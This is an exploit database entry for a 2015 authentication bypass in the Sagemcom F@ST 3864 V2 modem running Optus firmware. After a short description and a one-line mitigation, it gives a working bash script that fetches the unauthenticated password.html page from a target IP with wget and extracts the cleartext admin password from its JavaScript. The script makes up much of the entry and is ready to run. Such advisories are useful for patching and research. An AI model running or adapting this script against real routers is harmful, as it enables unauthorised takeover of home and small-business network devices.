Sagemcom 3864 V2 get admin password

vendor:

F@ST 3864 V2

by:

Cade Bull

7.5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: F@ST 3864 V2

Affected Version From: 7.253.2_F3864V2_Optus

Affected Version To: 7.253.2_F3864V2_Optus

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2015

Sagemcom 3864 V2 get admin password

The Sagemcom modem does not authenticate users when requesting pages, only whilst posting forms. The password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials.

Mitigation:

Ensure that authentication is required for all pages and that passwords are not stored in plain text.

Source

Exploit-DB raw data:

#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################

# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
 
if [ "$1" != "" ]
then
	IP_ADDRESS="$1"
else
	echo "Usage : $0 IP_ADDRESS"
	exit 1
fi
 
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O -  | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"